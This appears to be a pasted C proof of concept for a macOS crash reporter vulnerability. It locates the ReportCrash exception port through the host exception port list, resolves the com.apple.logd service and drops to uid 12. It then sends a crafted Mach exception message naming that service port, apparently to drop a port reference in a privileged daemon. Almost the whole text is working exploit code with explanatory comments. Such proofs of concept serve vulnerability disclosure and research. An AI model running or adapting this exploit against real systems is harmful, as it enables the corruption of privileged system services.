
Proof of concept: crash reporter vulnerability

a guest
May 21st, 2018
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <unistd.h>
  4. #include <servers/bootstrap.h>
  5. #include <mach/mach.h>
  6. #include <mach/task.h>
  7.  
  8. #include "mach_exc.h"
  9. #include <mach/exception_types.h>
  10.  
  11.  
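/*
 * Send one mach_exception_raise_state_identity message to the crash
 * reporter's exception port, with target_port in the second argument slot
 * (the one the MIG definition calls `thread`) and MACH_PORT_NULL as the task.
 * Exception type, code and all state lengths are 0 and both state buffers
 * are NULL, so no thread state travels with the message.
 *
 * @param report_crash_port  exception port obtained from the host port list
 * @param target_port        port name placed in the message's thread slot
 * @return the kern_return_t of the send.  The original discarded it, which
 *         hid send failures such as an invalid port name after the caller's
 *         privilege drop; returning it keeps existing void-context callers
 *         working.
 */
kern_return_t drop_ref(mach_port_t report_crash_port, mach_port_t target_port) {
    int flavor = 0;
    mach_msg_type_number_t new_stateCnt = 0;

    return mach_exception_raise_state_identity(
        report_crash_port,   /* exception_port */
        target_port,         /* thread slot */
        MACH_PORT_NULL,      /* task slot */
        0,                   /* exception type */
        0,                   /* code (NULL) */
        0,                   /* codeCnt */
        &flavor,
        NULL,                /* old_state */
        0,                   /* old_stateCnt */
        NULL,                /* new_state */
        &new_stateCnt);
}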
  28.  
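/*
 * Entry point of the PoC.  Must start as root: it lists the host exception
 * ports, keeps the one whose mask includes EXC_RESOURCE (the author expects
 * this to be ReportCrash), resolves the "com.apple.logd" bootstrap service,
 * drops to uid 12 and then sends a single exception message naming that
 * service port via drop_ref().  Every step prints what it found so a run can
 * be correlated with what the receiving side logs.  Besides those stdout
 * lines and that one Mach message the program has no side effects.
 *
 * Always returns 0, as the original did: a failed precondition is reported
 * on stdout and the program simply stops.
 *
 * Fixes relative to the original: `count` (mach_msg_type_number_t, unsigned)
 * was printed with %d and compared against a signed loop index, and the
 * result of task_get_bootstrap_port() was never checked.
 */
int main(void) {
    if (getuid() != 0) {
        printf("this PoC should be run as root\n");
        return 0;
    }

    /* Enumerate the host-level exception ports.  (The author left a
     * task_get_exception_ports(mach_task_self(), ...) variant commented out
     * here; host-level is what the PoC actually uses.) */
    exception_mask_t masks[EXC_TYPES_COUNT] = {0};
    mach_msg_type_number_t count = EXC_TYPES_COUNT;
    mach_port_t ports[EXC_TYPES_COUNT] = {0};
    exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
    thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};

    kern_return_t err = host_get_exception_ports(mach_host_self(),
                                                 EXC_MASK_ALL,
                                                 masks,
                                                 &count,
                                                 ports,
                                                 behaviors,
                                                 flavors);
    if (err != KERN_SUCCESS) {
        printf("failed to get the exception ports\n");
        return 0;
    }

    printf("count: %u\n", count);

    /* Masks are one bit per exception type; if several entries match, the
     * last one wins (same as the original). */
    mach_port_t report_crash_port = MACH_PORT_NULL;
    for (mach_msg_type_number_t i = 0; i < count; i++) {
        printf("port: %x %08x\n", ports[i], masks[i]);
        if (masks[i] & (1u << EXC_RESOURCE)) {
            report_crash_port = ports[i];
        }
    }

    if (report_crash_port == MACH_PORT_NULL) {
        printf("couldn't find ReportCrash port\n");
        return 0;
    }
    printf("report crash port: 0x%x\n", report_crash_port);

    /* The port we will name in the exception message.  An unchecked
     * task_get_bootstrap_port() failure would leave bs as MACH_PORT_NULL and
     * surface only as a less specific look-up error below. */
    mach_port_t bs = MACH_PORT_NULL;
    err = task_get_bootstrap_port(mach_task_self(), &bs);
    if (err != KERN_SUCCESS) {
        printf("unable to get bootstrap port\n");
        return 0;
    }
    printf("targeting bootstrap port: %x\n", bs);

    mach_port_t service_port = MACH_PORT_NULL;
    err = bootstrap_look_up(bs, "com.apple.logd", &service_port);
    if (err != KERN_SUCCESS) {
        printf("unable to look up target service\n");
        return 0;
    }
    printf("got service: 0x%x\n", service_port);

    /* Triggering the bug requires that the message is sent from a different
     * uid; drop to everyone (12). */
    if (setuid(12) != 0) {
        printf("setuid failed...\n");
        return 0;
    }
    printf("dropped to uid 12\n");

    drop_ref(report_crash_port, service_port);

    return 0;
}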